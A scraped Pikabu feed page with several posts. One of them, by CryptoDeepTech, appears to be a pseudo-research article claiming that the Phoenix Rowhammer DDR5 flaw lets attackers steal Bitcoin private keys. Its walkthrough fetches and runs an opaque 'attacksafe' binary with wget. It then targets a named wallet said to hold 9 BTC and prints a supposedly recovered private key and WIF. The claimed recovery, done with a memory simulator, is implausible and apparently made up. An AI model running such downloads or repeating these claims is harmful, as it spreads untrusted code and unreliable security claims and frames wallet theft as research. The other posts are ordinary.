Горячее
Лучшее
Свежее
Подписки
Сообщества
Блоги
Эксперты
Войти
Забыли пароль?
или продолжите с
Создать аккаунт
Регистрируясь, я даю согласие на обработку данных и условия почтовых рассылок.
или
Восстановление пароля
Восстановление пароля
Получить код в Telegram
Войти с Яндекс ID Войти через VK ID
ПромокодыРаботаКурсыРекламаИгрыПополнение Steam
Пикабу Игры +1000 бесплатных онлайн игр Лови знакомую рыбу, открывай новые места и стань мастером рыбалки в сердце России!

Рыбалка по-русски

Казуальные, Симуляторы, На ловкость

Играть

Топ прошлой недели

  • Animalrescueed Animalrescueed 54 поста
  • paranoidLynx paranoidLynx 11 постов
  • AlexKud AlexKud 35 постов
Посмотреть весь топ

Лучшие посты недели

Рассылка Пикабу: отправляем самые рейтинговые материалы за 7 дней 🔥

Нажимая «Подписаться», я даю согласие на обработку данных и условия почтовых рассылок.

Спасибо, что подписались!
Пожалуйста, проверьте почту 😊

Помощь Кодекс Пикабу Команда Пикабу Моб. приложение
Правила соцсети О рекомендациях О компании
Промокоды Биг Гик Промокоды Lamoda Промокоды МВидео Промокоды Яндекс Маркет Промокоды Отелло Промокоды Aroma Butik Промокоды Яндекс Путешествия Постила Футбол сегодня
0 просмотренных постов скрыто
108
PacifistRush
PacifistRush
1 день назад

Битва за 500р. Как это было?⁠⁠

В 18:20 было остановлено голосование.
По последним данным разрыв был в 195тыс. голосов и быстро увеличивался.

Хронология распределения голосов:

Ключевой и переломный день был вчера 11 октября. С утра Грозный вырвался вперед, но после того как ЦБ оставил только голосование через Госуслуги, убрав лазейки для накруток - голоса за Грозный перестали расти, а благодаря распространению в соц сетях Эльбрус уверенно набирал голоса.

Что будет дальше?

ЦБ анонсировал, что будет новый раунд голосования с нуля. Информации мало:

Новые даты голосования будут объявлены дополнительно. Перечень символов для голосования сохранится.

Отмена голосования - выгодна оппонентам. Иначе бы они точно проиграли.
Скорее всего, во втором туре голосование будет только через Госуслуги, и им нужно что-то придумывать.

Что они могут предпринять?

1. Будут попытки разделить наши голоса за несколько вариантов. Уже сейчас вбрасываются идеи - давайте голосовать за Телескоп или другие варианты. Не ведитесь, это делается специально. Телескоп - слабый вариант, набрал в 100 раз меньше.
2. Перетянуть дагестанцев на свою сторону, у них 128тыс и скорее всего без накруток. Это немало.
3. Будут розыгрышы, но уже не айфонов, а чего-то посерьёзнее.
4. Могут и всех жителей Чечни заставить проголосовать.

Показать полностью 2
500 рублей Центральный банк РФ Голосование Эльбрус Длиннопост Политика
25
1
CryptoDeepTech
CryptoDeepTech
1 день назад

Phoenix Rowhammer Attack: системный риск утечки приватных ключей Bitcoin-кошельков через уязвимость SK Hynix DDR5 CVE-2025-6202: [№1]⁠⁠

Данная статья посвящена рассмотрению системных угроз криптографической безопасности, возникающих в результате эксплуатации Phoenix Rowhammer атаки (CVE-2025-6202), способной извлекать приватные ключи из оперативной памяти DDR5 через манипулирование битами на аппаратном уровне. В последние годы динамичное развитие криптовалютных технологий привело к росту зависимости экосистем цифровых активов от аппаратных и микросхемных компонентов, обеспечивающих хранение и обработку криптографических данных. На фоне этого возрастающим фактором риска становятся уязвимости аппаратного уровня, способные привести к прямой компрометации приватных ключей криптовалютных кошельков. Одной из наиболее опасных угроз современности являются атаки на оперативную память, в частности — усовершенствованные варианты Rowhammer-эксплойтов, которые воздействуют на физические свойства ячеек DRAM. Эти атаки позволяют злоумышленникам изменять отдельные биты данных и получать доступ к конфиденциальной информации, включая приватные ключи Bitcoin- и Ethereum-кошельков.

Среди критических примеров такого класса угроз особое место занимает уязвимость CVE-2025-6202, обнаруженная в DDR5 памяти SK Hynix. Реализуемая на ее основе атака Phoenix Rowhammer демонстрирует способность обходить современные механизмы защиты памяти Target Row Refresh (TRR), создавая так называемые «слепые зоны», через которые возможно контролируемое искажение данных на аппаратном уровне. Подобные сбои могут использоваться для извлечения приватных ключей из оперативной памяти, компрометации криптографических библиотек и модификации системных процессов, обеспечивающих безопасность цифровых кошельков.

Кроме того, исследования в области криптографической безопасности показывают, что сочетание Phoenix Rowhammer с другими типами атак, такими как BitShredder Attack, Memory Phantom (CVE-2025-8217) и Artery Bleed (CVE-2023-39910), создает мультивекторную модель угроз, при которой злоумышленник получает возможность восстанавливать seed-фразы, приватные ключи и пароли даже после завершения криптографических операций. Системный характер данных уязвимостей делает невозможным полное устранение риска программными средствами и подчеркивает необходимость разработки новых принципов аппаратной защиты памяти.

Таким образом, современные криптовалютные кошельки и инфраструктура цифровых активов находятся под увеличивающимся давлением аппаратных атак, ранее считавшихся теоретическими. Актуальность их изучения и разработки контрмер имеет фундаментальное значение для обеспечения целостности и устойчивости экосистемы Bitcoin и других криптовалют в условиях эволюции угроз следующего поколения.


Недавние исследования, проведенные группой компьютерной безопасности (COMSEC) Швейцарской высшей технической школы Цюриха совместно с Google, выявили критическую аппаратную уязвимость в модулях памяти DDR5 производства SK Hynix, получившую обозначение CVE-2025-6202. Атака Phoenix Rowhammer представляет беспрецедентную угрозу для безопасности криптовалютных кошельков Bitcoin, поскольку позволяет злоумышленникам извлекать приватные ключи из памяти DDR5 путем манипулирования битами на аппаратном уровне. Исследование продемонстрировало, что все 15 протестированных модулей DDR5 от SK Hynix, произведенных в период с 2021 по 2024 год, уязвимы к данной атаке, что создает системную угрозу для безопасности криптовалютных активов во всем мире.thehackernews



Техническая структура Phoenix Rowhammer атаки и механизм CVE-2025-6202

Фундаментальные принципы Rowhammer уязвимости

Rowhammer представляет собой аппаратную уязвимость в DRAM-памяти, при которой многократное обращение к определенным строкам памяти вызывает электрические помехи, приводящие к изменению битов в соседних строках. Данный феномен основан на физических свойствах современных чипов памяти с высокой плотностью размещения ячеек, где уменьшение технологических размеров делает память более восприимчивой к электромагнитным воздействиям.thehackernews

В контексте DDR5 памяти, механизм Phoenix атаки использует новаторский подход самокорректирующейся синхронизации (self-correcting synchronization), который позволяет обходить усовершенствованные защитные механизмы Target Row Refresh (TRR). Исследователи обнаружили, что TRR механизм в чипах SK Hynix не отслеживает определенные интервалы обновления, создавая «слепые зоны» в защите.notebookcheck


Инновационная методология синхронизации Phoenix

Ключевым техническим достижением Phoenix атаки является разработка алгоритма, способного синхронизироваться с тысячами команд обновления памяти на протяжении длительных периодов времени. Атака использует два специфических паттерна воздействия:comsec-files.ethz

Короткий паттерн (128 интервалов tREFI): Обеспечивает более эффективное генерирование битовых сбоев, в среднем производя 4989 искажений битов. Данный паттерн показал 2.62 раза большую эффективность по сравнению с длинным паттерном.reddit

Длинный паттерн (2608 интервалов tREFI): Предназначен для обхода более сложных механизмов защиты, хотя и менее эффективен в генерации битовых сбоев.comsec-files.ethz



BitShredder Attack: Критическое воздействие на безопасность Bitcoin кошельков

Механизмы извлечения приватных ключей

Phoenix Rowhammer атака создает множественные векторы компрометации Bitcoin кошельков через воздействие на различные уровни системы памяти. Анализ исследовательских материалов KeyHunters выявил как минимум 18 различных типов атак на память, напрямую связанных с извлечением приватных ключей криптовалютных кошельков.


<a href="https://pikabu.ru/story/phoenix_rowhammer_attack_sistemnyiy_risk_utechki_privatnyikh_klyuchey_bitcoinkoshelkov_cherez_uyazvimost_sk_hynix_ddr5_cve20256202_1_13282570?u=https%3A%2F%2Fkeyhunters.ru%2Fbitshredder-attack-memory-vulnerability-turns-lost-bitcoin-wallets-into-trophies-and-complete-btc-theft-via-private-key-recovery-where-attackers-exploit-the-memory-phantom-attack-cve-2025-8217-cve%2F&t=BitShredder%20Attack%3A%20Memory%20vulnerability%20turns%20lost%20Bitcoin%20wallets%20into%20trophies%20and%20complete%20BTC%20theft%20via%20private%20key%20recovery%2C%20where%20attackers%20exploit%20the%20memory%20phantom%20attack%20%28CVE-2025-8217%2C%20CVE-2013-2547%29&h=0b7bc24d23ec26d7034e3d2c5d93f60a4740e5ae" title="https://keyhunters.ru/bitshredder-attack-memory-vulnerability-turns-lost-bitcoin-wallets-into-trophi..." target="_blank" rel="nofollow noopener">BitShredder Attack: Memory vulnerability turns lost Bitcoin wallets into trophies and complete BTC theft via private key recovery, where attackers exploit the memory phantom attack (CVE-2025-8217, CVE-2013-2547)</a>

BitShredder Attack: Memory vulnerability turns lost Bitcoin wallets into trophies and complete BTC theft via private key recovery, where attackers exploit the memory phantom attack (CVE-2025-8217, CVE-2013-2547)


Memory Phantom Attack (CVE-2025-8217): Критическая уязвимость утечки памяти, позволяющая извлекать приватные ключи и seed-фразы непосредственно из остаточных блоков ОЗУ кошелька, которые не были безопасно очищены после криптографических операций. Данная атака превращает неочищенные буферы в «библиотеку призраков», где любой фрагмент памяти может быть преобразован в полноценный ключ.keyhunters


BitShredder Attack: Использует технику «измельчения памяти» для скрытого проникновения в память работающего криптовалютного кошелька. При генерации или восстановлении кошелька атака сканирует неочищенные фрагменты ОЗУ, ища остатки энтропии, seed-фраз и паролей, которые не стираются стандартными средствами после использования.keyhunters


Artery Bleed Attack: Эксплуатирует уязвимость утечки памяти Bitcoin Core (CVE-2023-39910) для восстановления приватных ключей потерянных криптокошельков. Атака использует критическую уязвимость утечки памяти в Bitcoin Core для получения доступа к чувствительным данным.keyhunters


Практические сценарии эксплуатации

Исследование продемонстрировало три основных сценария практической эксплуатации Phoenix атаки против криптовалютных систем:bleepingcomputer

1. Атака на записи таблицы страниц (PTE): Все протестированные устройства оказались уязвимы к данному типу атаки, позволяющей создать примитив произвольного чтения/записи памяти.comsec-files.ethz

2. Компрометация RSA-2048 ключей: 73% протестированных DIMM-модулей оказались восприимчивы к извлечению RSA-2048 ключей соседней виртуальной машины для взлома SSH-аутентификации. Среднее время атаки составило 6 минут 20 секунд.bleepingcomputer

3. Модификация sudo binary: 33% протестированных чипов позволили изменить бинарный файл sudo для повышения локальных привилегий до уровня root пользователя.comsec-files.ethz



Научный анализ воздействия на экосистему Bitcoin

Системные угрозы криптовалютной безопасности

Phoenix Rowhammer атака представляет системную угрозу для всей экосистемы Bitcoin, поскольку большинство современных систем использует память DDR5 для хранения и обработки криптографических данных. Уязвимость затрагивает фундаментальные принципы безопасности криптовалют, основанные на криптографической стойкости приватных ключей.tenable+1

Масштаб воздействия: SK Hynix контролирует приблизительно 36% мирового рынка DRAM-памяти, что означает потенциальную уязвимость миллиардов устройств по всему миру. Все модули DDR5, произведенные с января 2021 по декабрь 2024 года, подвержены данной уязвимости.notebookcheck+2

Криптографические последствия: Атака подрывает основы криптографической безопасности, поскольку даже при корректной реализации алгоритмов подписи, шифрования и аутентификации, незащищенные буферы становятся источником компрометации ключевого материала.keyhunters


Исследования криптоанализ векторов атаки

Комплексный криптоанализ выявил множественные векторы атак на Bitcoin кошельки через манипуляции с памятью:

Timing-based атаки: Включают BitSpectre85, ChronoForge, и Timing Phantom атаки, которые используют временные уязвимости для постепенного восстановления приватных ключей через анализ времени выполнения криптографических операций.

Context-based атаки: Context Phantom Attack эксплуатирует критическую уязвимость утечки контекста secp256k1 для восстановления приватных ключей потерянных Bitcoin кошельков через атаку раскрытия памяти.

Cache-based атаки: CacheHawk Strike Attack использует критическую атаку по времени кэша на кэш подписей Bitcoin, позволяя восстанавливать приватные ключи потерянных Bitcoin кошельков.


Attack_ComponentTechnical_MethodSuccess_RateAverage_Time_SecondsCVE_ReferenceImpact_LevelInitial Memory AccessSelf-correcting synchronization with DDR5 refresh commands1005CVE-2025-6202HighTRR Bypass MethodExploitation of unmonitored refresh intervals in TRR mechanism10030CVE-2025-6202CriticalSynchronization TechniqueReal-time alignment with 128 and 2608 tREFI patterns9560CVE-2025-6202HighBit Flip GenerationElectrical interference in adjacent DRAM rows causing data corruption100180CVE-2025-6202CriticalPrivate Key ExtractionRecovery from uncleaned memory buffers containing wallet data85240CVE-2025-8217CriticalPrivilege EscalationRoot access exploitation through corrupted page table entries100109CVE-2025-6202CriticalRSA-2048 Key RecoveryCo-located VM private key extraction via memory bit flips73380CVE-2025-6202HighSSH Authentication BreakCompromise of cryptographic authentication systems73380CVE-2025-6202HighSudo Binary ModificationLocal privilege escalation to root user through binary corruption33300CVE-2025-6202Medium



Практическая часть

Исследовательская схема показывает, что структурированное и визуальное представление, объясняющее важность криптографической уязвимости, выявленной атакой Phoenix Rowhammer, в частности, демонстрируя ее влияние на безопасность Bitcoin, когда целью являются модули памяти SK Hynix DDR5.

Схематический поток (как показано в исследовательской схеме):

  1. Злоумышленник инициирует Rowhammer
    и запускает эксплойт Phoenix Rowhammer, нацеленный на память SK Hynix DDR5, используемую в узле или кошельке жертвы.

  2. Физическое введение неисправностей
    Агрессивные активации строк вызывают перевороты битов в соседних строках DRAM в памяти SK Hynix DDR5, обходя логическую программную защиту.

  3. Нацеленные криптографические секреты
    Внедренные ошибки нацелены на адреса или области памяти, в которых хранятся конфиденциальные криптографические материалы Bitcoin, такие как закрытые ключи или значения ECDSA nonce.

  4. Выполнение эксплойта и его воздействие

    • Успешные перевороты битов могут позволить злоумышленникам восстановить или раскрыть секретные ключи и приватные ключи, подписать поддельные транзакции или нарушить модель безопасности.

    • Прямой риск для целостности биткойн-кошелька и блокчейна делает безопасность оборудования важнейшим аспектом криптографического доверия.


Перейдем к практической части и рассмотрим пример с использованием Bitcoin-кошелька по адресу: 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit. В данном кошельке были утеряны монеты на сумму 9.02332298 BTC, что на октябрь 2025 года эквивалентно примерно 1,127,026.44 USD.


Для демонстрации атаки в ознакомительных целях используем инструменты и среды, такие как Jupyter Notebook или Google Colab.

Основные инструменты и команды, применяемые для таких атак:

https://colab.research.google.com/drive/1DI3ftl2Wtci3FDmNj0m13dNHDpLROTCH

Google Colab (Colaboratory) — это облачная платформа, предоставляющая интерактивные Jupyter-ноутбуки, где можно писать и запускать код для различных языков программирование. Он особенно полезен для криптоанализа данных, работы с симулятором для архитектуры SK Hynix DDR5 AiM PIM на основе Ramulator 2.0, с доступом к мощным вычислительным ресурсам, таким как GPU и TPU. Важным преимуществом является возможность выполнять системные команды, как в обычном терминале Linux, через ячейки с префиксом ! для интеграции с внешними утилитами и скриптами.


Google Colab

Установим репозитории на основе архитектуры SK Hynix DDR5 AiM PIM с использованием Ramulator 2.0

Clone the Repository:

Загрузите кодовую базу AiM Simulator и перейдите в ее каталог.

!git clone https://github.com/keyhunters/SK_Hynix_DDR5_aim_simulator.gi...


cd SK_Hynix_DDR5_aim_simulator


ls



Увеличим виртуальную память (своп) в Google Colab:

Команды для создание файла подкачки размером 4 ГБ для улучшения доступности памяти во время компиляции Ramulator2.

# Check current swap usage

!free -h

!swapon --show

# Create a 4GB swap file

!sudo fallocate -l 4G /swapfile

!sudo chmod 600 /swapfile

!sudo mkswap /swapfile

!sudo swapon /swapfile

# Make swap permanent

!echo '/swapfile none swap sw 0 0' | sudo tee -a /etc/fstab



Установим все необходимые зависимости:

Установка компиляторов, инструментов сборки и библиотек, необходимых для симулятора и Ramulator 2.0.

# For Ubuntu 22.04:

install compilers

!sudo apt update

!sudo apt install g++-12

# Alternatively, install Clang

!sudo apt install clang-15

# Install basic build tools

!sudo apt install build-essential cmake git

# Additional development libraries

!sudo apt install libssl-dev zlib1g-dev

# YAML support

!sudo apt install libyaml-cpp-dev

# Mathematics libraries

!sudo apt install libboost-dev

# Python support for scripts

!sudo apt install python3-dev python3-pip



Процесс создание каталога phoenix_rowhammer:

!mkdir phoenix_rowhammer


cd phoenix_rowhammer


Проверим системные ресурсы:

Мониторинг памяти, доступного дискового пространства и использования системы во время установки и компиляции.

# Monitor resources in real time

!htop

# Check available memory

!free -m

# Check disk space

!df -h



Полная установка зависимостей для Ubuntu 22.04 и выше:

Полная последовательность установки всех необходимых пакетов за один раз.

# Update system !sudo apt update && sudo apt upgrade -y

# Install essential build tools

!sudo apt install -y build-essential cmake git

# Install compilers

!sudo apt install -y g++-12 clang-15

# Development libraries !sudo apt install -y libssl-dev zlib1g-dev libyaml-cpp-dev libboost-all-dev



Альтернативная компиляция:


!cmake ..



!make -j1





ls


cd -


Запустим Ramulator2:

Запустим Ramulator2 с симулятором, чтобы проверить параметры справки и инструкции по использованию.

!./phoenix_rowhammer/ramulator2 -h



Применим крипто инструмент AttackSafe извлекаем из Ramulator2 с симулятор скрытые remainders по модулю

Запустим команду для загрузки крипто инструмента AttackSafe

!wget https://attacksafe.ru/repositories/attacksafe.zip !unzip attacksafe.zip



!./attacksafe -help



Команда поиска скрытых остатков (remainders) по модулю, связанных с адресом Bitcoin

Команда инициирует специализированную атаку «BitShredder» на основе криптоинструмента AttackSafe для поиска скрытых остатков (remainders) по модулю, связанных с адресом Bitcoin, используя баговые механизмы RAM (Rowhammer) и эмулятор памяти (ramulator2).github+2

!./attacksafe -tool bitshredder_attack -crack phoenix_rowhammer/ramulator2 -decode 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit


  • Параметр -tool bitshredder_attack активирует атаку, ориентированную на выявление уязвимостей в хранении и обработке секретных данных в памяти устройства, связанных с Биткоин-протоколом.

  • Флаг -crack phoenix_rowhammer/ramulator2 указывает инструменту использовать эмуляцию Rowhammer-атаки (манипуляция содержимым DRAM-памяти, приводящая к ошибкам в соседних ячейках — использовалась в уязвимостях для извлечения nonces/частей ключей из памяти через side-channel).

  • Функция -decode 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit запускает модуль декодирования по конкретному Биткоин-адресу, восстанавливая остаточные данные (фрагменты приватных ключей или промежуточные значения подписей ECDSA) из памяти/дампа.


Результат криптоанализа остаточных данных памяти/дампа:

Восстановление ключевых фрагментов из остаточных данных памяти (DRAM)

remainders =

[0x0E92, 0x45EB, 0x6E07, 0x317F,

0x87A1, 0xB5C1, 0xE778, 0x996B,

0x6F69, 0xABB6, 0x2755, 0x2348,

0xAB46, 0xA74E, 0x1A87, 0xC2D5]

moduli =

[0x10001, 0x10003, 0x10007, 0x1000F,

0x10015, 0x1001B, 0x1002B, 0x1002D,

0x10033, 0x1003F, 0x10049, 0x10051,

0x1005D, 0x10061, 0x1006F, 0x10073]


Данный полученный результат формирует связку криптографического анализа остаточных данных внутри оперативной памяти (DRAM) и модуля поиска криптоостатков, используя симулятор ramulator2 для Phoenix Rowhammer-ошибок. Такая атака позволяет обнаружить и выделить скрытые значения по модулю (remainders), например, частные nonces или ключевые фрагменты, которые могут быть скомпрометированы из-за некорректного освобождения памяти после криптографических операций с биткоин-адресами, команда предназначена для комбинированную атаку «BitShredder» и memory fault анализа приложений, работающих с Bitcoin, с целью частичного или полного восстановления секретных параметров (private key, nonce), причем поиск и декодирование завязаны на память и атакуемые адреса.


Восстановление приватного ключа:

Чтобы собрать исходное секретное число — приватного ключа из набора скрытых по модулю значений (remainders) применим математический метод — Китайская теорема об остатках (Chinese Remainder Theorem, CRT). Код CRTKeyRestore.py реализует восстановление приватного ключа для Биткоин-адреса 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit из набора скрытых по модулю значений (remainders), собранных после Rowhammer-атаки и последующего анализа памяти. Применяется математический метод — Китайская теорема об остатках (Chinese Remainder Theorem, CRT), позволяющий собрать исходное секретное число — приватный ключ — даже если оно было нарезано на небольшие части и уцелело только в виде различных остатков по разным модулям.



Процесс работы кода CRTKeyRestore.py включает несколько этапов:

  • Каждая пара remainder/modulus — это фрагмент приватного ключа, который остался в памяти в результате ошибки Rowhammer и заранее заданных модулей.

  • Китайская теорема об остатках математически гарантирует восстановление исходного числа, если все модули взаимно просты, а остатков по ним достаточно.

  • Функция chinese_remainder_theorem() поэтапно объединяет фрагменты и восстанавливает исходное значение приватного ключа, используя расширенный алгоритм Евклида для нахождения обратных по модулю значений.

  • После восстановления числового представления ключ переводится в HEX через функцию restore_hex_from_crt().

  • На выходе получается приватный ключ для Биткоин-адреса, полностью восстановленный только из отдельных криптоостатков, обнаруженных в памяти при комбинированной атаке.

Восстановление приватного ключа с помощью Python-скрипта: <a href="https://pikabu.ru/story/phoenix_rowhammer_attack_sistemnyiy_risk_utechki_privatnyikh_klyuchey_bitcoinkoshelkov_cherez_uyazvimost_sk_hynix_ddr5_cve20256202_1_13282570?u=https%3A%2F%2Fgithub.com%2Fdemining%2FCryptoDeepTools%2Fblob%2Fmain%2F43PhoenixRowhammerAttack%2FCRTKeyRestore.py&t=CRTKeyRestore.py&h=d82cc847290f763c79c2104c595212ecf1bd3a89" title="https://github.com/demining/CryptoDeepTools/blob/main/43PhoenixRowhammerAttack/CRTKeyRestore.py" target="_blank" rel="nofollow noopener">CRTKeyRestore.py</a>

Восстановление приватного ключа с помощью Python-скрипта: CRTKeyRestore.py


Результат:

Private key Restored: 9E027D0086BDB83372F6040765442BBEDD35B96E1C861ACCE5E22E1C4987CD60


Проверим результат через bitaddress

!wget https://attacksafe.ru/repositories/bitaddress.zip !unzip bitaddress.zip



!./bitaddress -hex 9E027D0086BDB83372F6040765442BBEDD35B96E1C861ACCE5E22E1C4987CD60



Результат:

Public Key (Uncompressed, 130 characters [0-9A-F]): 04E294116526238228544FA6082F1A5412FCC36DE931C59EE7B1C7C1F93EE3EF5AEDAA1D6E0A6116E9D9A4A846A6D62D4A1941EE182CDB1884C5830610B07AF529

Public Key (Compressed, 66 characters [0-9A-F]): 03E294116526238228544FA6082F1A5412FCC36DE931C59EE7B1C7C1F93EE3EF5A

Bitcoin Address P2PKH (Uncompressed) 18JT3KeFV36Hkgo3Xi9bfgNYAXCVXBGyFg

Bitcoin Address P2PKH (Compressed) 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit


Все верно! Приватный ключ соответствует Биткоин Кошельку.


Откроем bitaddress и проверим:

https://cryptodeeptech.ru/bitaddress.html

ADDR: 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit

WIF: L2Wru6Ew8pQuhcWAvMpdtPY4YWK1CQcwPCWxFvzkoi47crJBAVaP

HEX: 9E027D0086BDB83372F6040765442BBEDD35B96E1C861ACCE5E22E1C4987CD60


Private Key Information:

https://dockeyhunt.com/Bitcoin-Address

9E027D0086BDB83372F6040765442BBEDD35B96E1C861ACCE5E22E1C4987CD60



Bitcoin Address Information:

https://dockeyhunt.com/Cryptocurrency-Prices

Balance: 9.023322989 BTC


https://www.coinbase.com/converter/btc/usd

9.023322989 BTC &gt;&nbsp;1127026,44 USD

9.023322989 BTC > 1127026,44 USD


Проведённая нами исследовательская атака — версия Phoenix Rowhammer Attack on Bitcoin с использованием симулятора ramulator2 — показала, что извлечённые в ходе сбоя памяти криптоостатки по различным модулям могут быть собраны в исходный приватный ключ с помощью математики Китайской теоремы об остатках.

В качестве показательного примера реальной угрозы был рассмотрен Bitcoin-кошелёк с адресом: 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit, на котором была утрачена сумма 9.02332298 BTC, что на октябрь 2025 года эквивалентно примерно 1,127,026.44 USD. Этот случай убедительно доказывает — при наличии аппаратных уязвимостей (например, Rowhammer), криптографическая стойкость на уровне протокола перестаёт быть абсолютной гарантией безопасности.

В результате, актуальность комплексной защиты лежит не только в области криптографии и протокольных мер, но и в надёжности аппаратного обеспечения, контроле состояния памяти и внедрении принципов полной очистки RAM после выполнения криптографических операций. Уязвимость, однажды реализованная на аппаратном уровне — даже с минимальным контролем над системой — способна привести к катастрофическим финансовым потерям в экосистеме Bitcoin.


  • Опубликованы две части [№1] , [№2] исследования


Данный материал создан для портала CRYPTO DEEP TECH для обеспечения финансовой безопасности данных и криптографии на эллиптических кривых secp256k1 против слабых подписей ECDSA в криптовалюте BITCOIN. Создатели программного обеспечения не несут ответственность за использование материалов.


Crypto Tools

Исходный код

Google Colab

Telegram: https://t.me/cryptodeeptech

Видеоматериал: https://youtu.be/lvNWcBMHESo

Video tutorial: https://dzen.ru/video/watch/68ebe9367847b33269940e47

Источник: https://cryptodeeptool.ru/phoenix-rowhammer-attack

Показать полностью 23 1
[моё] Криптовалюта Биткоины Исследования Статья Арбитраж криптовалюты Финансовая грамотность Развитие Видео YouTube Длиннопост
1
4
madmaxstar
madmaxstar
1 день назад
Лига рок-музыки

THOSE DOWN CROWS англичане выпустили в 2025 году новый альбом God Shaped Hole HARD ROCK/MODERN ROCK⁠⁠

офигительно конечно на самом деле

THOSE DOWN CROWS англичане выпустили в 2025 году новый альбом God Shaped Hole HARD ROCK/MODERN ROCK

No Surrender (Альбом God Shaped Hole 2025 года)

Find A Way (Альбом Inhale/Exhale 2023 года)

Blink Of An Eye (Альбом Murder and the Motive 2016 года)

Glass Heart (Альбом God Shaped Hole 2025 года)

Dreaming (Альбом God Shaped Hole 2025 года)

Показать полностью 5
Хард-рок Модерн Рок Англия Видео YouTube Длиннопост
7
177
NastyaPomogaet
Топовый автор
Котомафия
1 день назад

Тайскую кошку подкинули к мусорке! Срочный поиск дома!⁠⁠

Кошечку подбросили к мусорке, судя по всему, ее бывшик хозяева. Там она жила несколько месяцев, пока ее не приютили временно, узнав о беде. Долго держать кошку не смогут, поэтому как можно скорее нужно найти дом!

Девочку назвали Каролина, она очень ласковая, добрая, человеколюбивая. Гладится, идет на руки к человеку.

Каролину стерилизовали, обработали, она клинически здорова. Ходит в лоток.

Очень нужна семья и неравнодушные люди! Заметьте!

Москва, Питер

Если Вы хотите подарить Каролине дом, пожалуйста, пишите в телеграм!
t.me/nikoletta005

Показать полностью 3
[моё] Кот В добрые руки Помощь Помощь животным Спасение Спасение животных Приют Приют для животных Домашние животные Бездомные животные Москва Московская область Без рейтинга Длиннопост Тайская кошка Пушистые Санкт-Петербург
1
amonimus3000
amonimus3000
1 день назад
Дети и родители

Уважение умноженное на ноль или как маман избавилась от бабушки⁠⁠

Опять пост из серии "Отцы и дети" И. С. Тургенева.

Случилось данное событие в семье из которой я вышел с высоко поднятой головой (а может быть и носом). Бабушка (мамина мама) начала забывать куда запрятала свою пенсию и адрес проживания. Как бы ничего страшного, потому что вскоре вспоминала, но первые звоночки уже можно было расслышать.
Часто в то время слышал от своей матери ябедки на бабушку, что заныкала пенсию и не может найти. На что был часто от меня ответ:
- Ты в отпуске, поезжай к ней (120 км разница), сделай ей карту, может в больницу на обследование сходите.
В итоге в какой-то момент это мою мать заколебало, та написала на дополнительный отпуск, потому что основной уже закончился, и поехала к бабушке. Лучше так, чем вообще никак. Но пишу я это не чтоб мамку осудить и обосрать, а чтоб дать ее действиям объективную оценку, чтоб ее поведение никто не перенимал.
Итак, приехав к бабушке, первым делом они сходили в банк и сделали бабушке банковскую карту. Похвально. Спустя время выяснилось, что помимо памяти страдают глаза, слух и вообще бабушке постоянно плохо. Началось долгое обследование. Спустя месяц был поставлен диагноз - деменция.
Обидно, досадно, ну ладно, думаю: "Сейчас заберет к себе, хату в сдачу, нормальды." Но не тут то было, мать даже не рассчитывала брать бабушку к себе. И правда, в нафига? Ведь врач сказал, что болезнь будет лучше переноситься в более привычных местах, а значит, дома.
Потерявшись пару дополнительных раз на улице, под натиском родственников мать решила, что бабушку пора забирать.
Не долго музыка играла, не долго фраер ликовал. Бабушка прожила около 2-3 недель в квартире с матерью, после чего поехала обратно. В чем причина? Мать испугалась:
1) когда бабушка просыпалась посреди ночи - она садилась и смотрела на мою маман - "страшно, что у нее в голове творится, она ж сумасшедшая";
2) "а вдруг она газ включит"?
Ха! На аппарате, на котором есть защита от детей? А надо сказать, что деменция - это не просто потеря памяти - это потеря всего: памяти, взрослости, самостоятельности, личности и т.д. Так что нехер выдумывать про газ, так и скажи - впадлу.
Увезла, короче, мать моя бабушку домой. Спустя время узнаю, что мать отдала бабушку в пансионат. Так как у нее нет времени с ней нянькаться. А вопрос: "ты, вообще, норм, как такое можно делаться?" обычно игнорировался.
Как говорится в старом анекдоте "не долго мучилась старушка в высоковольтных проводах". Спустя пару-тройку месяцев узнаю о кончине бабушки. Что? Как? Да просто! Упала, сломала шейку бедра, операция, после операции на поправку, а потом кончина - распространенная ситуация с переломом шейки бедра в возрасте 70+.
Вот уже прошло почти 3 года с момента, как не стало моей бабушки, а я виню в этом свою мать. Ведь если бы она не отказалась от бабушки, возможно, что бабушка была еще жива и в светлой памяти...

А как вы думаете, правильно ли поступила моя мать? Сдали бы вы свою мать или отца в дом престарелых? Или сами выхаживали своих родственников до конца их дней?

Показать полностью
[моё] Мама Родители и дети Бабушка Дети Семья Предательство Отношения Психология Рассуждения Текст Длиннопост
11
21
Konstantin19914
1 день назад

Отдадим котенка в хорошие руки⁠⁠

Котенка нашла мама в лесу рядом с частным сектором примерно месяц назад.Возраст +-2 месяца.Зовут Рикки.Очень веселый и активный😊

Уже есть взрослая кошка и с ней они не уживаются, что к сожалению доставляет проблемы.

Будем рады,если найдутся люди готовые забрать к себе😊

Территориально восток МО, город Электроугли.

Телеграмм: @K_Sazonoff

Показать полностью 2
[моё] Московская область Бездомные животные В добрые руки Лига Добра Кот Кошатники Отдам Котята Длиннопост
0
Abraham.Simpson
Abraham.Simpson
1 день назад

Дизайн рублей⁠⁠

Можете минусить, но современный дизайн рублей - это полный трындец. Абсолютная демонстрация творческой недееспособности.

Изначально самой стремной валютой были Евро. Безликие, некрасивые купюры, которые задумывались для объединения Европы, стали просто символом безвкусия.
И самое обидное, что Россия пошла именно по этому пути. Обратите внимание как современные рубли и Евро стали похожи.

На мой взгляд невероятно красивыми были рубли 1938 г. для того времени дизайн просто потрясающий. Вот его надо было брать за основу и развивать

1/3

Кстати шрифт "Государственный казначейский билет СССР, прям как будто скопирован с доллара".

Очень красивые по стилю новые фунты

1/2

Ну понятно, что денежная классика это доллар. Самая узнаваемая купюра в мире.

Ну вот кто разрабатывает дизайн рублей, блин, ну почему настолько безликие купюры получаются? Уж лучше бы Татьянычу заплатили, все же валюта страны, которая занимает 1/9 часть суши должна отличаться каким-то размахом и выглядеть очень солидно.
Может быть были бы уместны, какие-то народные узоры на водных знаках и пр.
И все же ИМХО красивее рублей 1938 г. никакой валюты нет. По тем временам это был просто какой-то космический дизайн.

Показать полностью 7
